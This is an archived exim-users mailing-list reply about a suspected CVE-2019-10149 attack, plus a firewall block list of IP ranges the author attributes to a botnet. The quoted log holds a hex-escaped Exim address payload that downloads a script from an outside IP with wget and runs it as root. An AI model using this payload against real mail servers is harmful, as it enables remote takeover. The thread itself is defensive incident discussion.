Re: [exim] just been hacked, could be CVE-2019-10149?

Top Page
This message is part of the following thread:
M\the complete thread tree sorted by date
MMCyborg at <-
.MOdhiambo Washington at ->
Delete this message
Reply to this message
Author: Klaus Ethgen
Date:  
To: exim-users
Subject: Re: [exim] just been hacked, could be CVE-2019-10149?
Hi,

Am Di den 11. Jun 2019 um 7:53 schrieb Cyborg via Exim-users:
> <bin+${run{\x2fbin\x2fbash\x20\x2dc\x20\x22wget\x20\x2d\x2dno\x2dcheck\x2dcertificate\x20\x2dt\x203\x20\x2dT\x2075\x20http\x3a\x2f\x2f185\x2e162\x2e235\x2e211\x2fldmxim\x20\x2dO\x20\x2froot\x2f\x2ekqvuhtpi\x20\x26\x26\x20sh\x20\x2froot\x2f\x2ekqvuhtpi\x20\x2dn\x22\x20\x26}}@???>:
> Restricted characters in address

Oh, you censored the address you are sending from? :-D

> This attack was presented to you by... the Seychelles Islands.

Ah, and I woundered why I did not see any try in my logs.

But I have the following blocks:
141.101.132.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
146.185.205.0/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
185.14.194.0/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
185.2.32.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
185.46.84.128/25 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
185.89.100.0/24 timeout 0 packets 48 bytes 2304 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
188.68.0.0/24 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
188.68.3.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-31"
188.72.126.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
188.72.127.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
188.72.96.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
193.93.192.0/24 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
194.40.241.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2018-10-27"
46.161.60.0/25 timeout 0 packets 12 bytes 576 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
46.161.61.0/24 timeout 0 packets 12 bytes 576 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
5.101.217.128/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
5.101.219.0/24 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
5.101.220.128/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
5.101.221.0/24 timeout 0 packets 36 bytes 1728 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
5.188.216.0/24 timeout 0 packets 48 bytes 2304 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
5.189.205.128/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
5.189.206.128/25 timeout 0 packets 12 bytes 576 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
5.189.207.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
5.62.154.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
5.62.159.0/24 timeout 0 packets 12 bytes 576 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
5.8.47.0/24 timeout 0 packets 72 bytes 3456 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
79.110.17.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2018-01-27"
79.110.28.0/25 timeout 0 packets 60 bytes 2880 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
80.82.64.0/24 timeout 0 packets 533 bytes 21952 comment "Durchseuchtes Seychelles-Botnetz 2019-05-14"
88.214.26.0/24 timeout 0 packets 112 bytes 4480 comment "Durchseuchtes Seychelles-Botnetz 2019-02-09"
89.248.168.0/24 timeout 0 packets 263 bytes 10520 comment "Durchseuchtes Seychelles-Botnetz 2019-03-21"
91.200.80.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-31"
91.204.14.128/25 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
93.179.90.0/24 timeout 0 packets 42 bytes 2016 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
95.181.176.0/24 timeout 0 packets 12 bytes 576 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
95.181.177.0/24 timeout 0 packets 48 bytes 2304 comment "Durchseuchtes Seychelles-Botnetz 2017-12-30"
95.181.217.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2018-01-03"
95.181.218.128/25 timeout 0 packets 12 bytes 576 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"
95.85.68.0/24 timeout 0 packets 0 bytes 0 comment "Durchseuchtes Seychelles-Botnetz 2018-07-29"
95.85.69.0/24 timeout 0 packets 36 bytes 1728 comment "Durchseuchtes Seychelles-Botnetz 2018-07-29"
95.85.70.0/24 timeout 0 packets 72 bytes 3456 comment "Durchseuchtes Seychelles-Botnetz 2018-07-29"
95.85.71.0/24 timeout 0 packets 36 bytes 1728 comment "Durchseuchtes Seychelles-Botnetz 2018-07-29"
95.85.80.0/24 timeout 0 packets 24 bytes 1152 comment "Durchseuchtes Seychelles-Botnetz 2017-12-29"

... in my ipfilter so blocking most of the net ranges that is owned by
Seychelles. There is nothing good coming from them. (The date is when I
blocket them.) 

Regards
   Klaus
-- 
Klaus Ethgen                                       http://www.ethgen.ch/
pub  4096R/4E20AF1C 2011-05-16            Klaus Ethgen <Klaus@???>
Fingerprint: 85D4 CA42 952C 949B 1753  62B3 79D0 B06F 4E20 AF1C

This message was posted to the following mailing lists:
Exim-users
Mailing List Info | Nearby Messages		<-Re: [exim] just been hacked, could be CVE-2019-10149?Re: [exim] just been hacked, could be CVE-2019-10149?->
Tahini and Hummus and Cumin Development Archives administrated by cumin AdminsLurker (version 2.3)